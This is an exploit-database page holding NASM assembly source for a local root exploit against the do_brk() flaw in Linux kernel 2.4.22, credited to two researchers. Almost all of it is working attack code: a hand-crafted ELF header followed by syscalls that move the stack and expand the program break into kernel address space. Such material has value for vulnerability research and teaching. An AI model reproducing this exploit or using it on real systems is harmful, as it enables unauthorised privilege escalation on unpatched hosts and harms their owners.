0day.today - Biggest Exploit Database in the World.
Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC)
=======================================================
Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC)
=======================================================

; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand its break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address.
;
; In most cases (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break.
;

BITS 32

org 0xBFFF0000

ehdr:                                   ; Elf32_Ehdr
        db 0x7F, "ELF", 1, 1, 1         ; e_ident
        times 9 db 0
        dw 2                            ; e_type
        dw 3                            ; e_machine
        dd 1                            ; e_version
        dd _start                       ; e_entry
        dd phdr - $$                    ; e_phoff
        dd 0                            ; e_shoff
        dd 0                            ; e_flags
        dw ehdrsize                     ; e_ehsize
        dw phdrsize                     ; e_phentsize
        dw 2                            ; e_phnum
        dw 0                            ; e_shentsize
        dw 0                            ; e_shnum
        dw 0                            ; e_shstrndx

ehdrsize equ $ - ehdr

phdr:                                   ; Elf32_Phdr
        dd 1                            ; p_type
        dd 0                            ; p_offset
        dd $$                           ; p_vaddr
        dd $$                           ; p_paddr
        dd filesize                     ; p_filesz
        dd filesize                     ; p_memsz
        dd 7                            ; p_flags
        dd 0x1000                       ; p_align

phdrsize equ $ - phdr

_start:
        ; ** Make sure the stack is not above us
        mov eax, 163                    ; mremap
        mov ebx, esp
        and ebx, ~(0x1000 - 1)          ; align to page size
        mov ecx, 0x1000                 ; we suppose stack is one page only
        mov edx, 0x9000                 ; be sure it can't get mapped after
                                        ; us
        mov esi, 1                      ; MREMAP_MAYMOVE
        int 0x80

        and esp, (0x1000 - 1)           ; offset in page
        add esp, eax                    ; stack ptr to new location
                                        ; nb: we don't fix
                                        ; pointers so environ/cmdline
                                        ; are not available

        mov eax, 152                    ; mlockall (for tests as root)
        mov ebx, 2                      ; MCL_FUTURE
        int 0x80

        ; get VMAs for the kernel memory
        mov eax, 45                     ; brk
        mov ebx, 0xC0500000
        int 0x80

        mov ecx, 4
loop0:
        mov eax, 2                      ; fork
        int 0x80
        loop loop0

_idle:
        mov eax, 162                    ; nanosleep
        mov ebx, timespec
        int 0x80
        jmp _idle

timespec dd 10, 0

filesize equ $ - $$

; # 0day.today [2024-11-15] #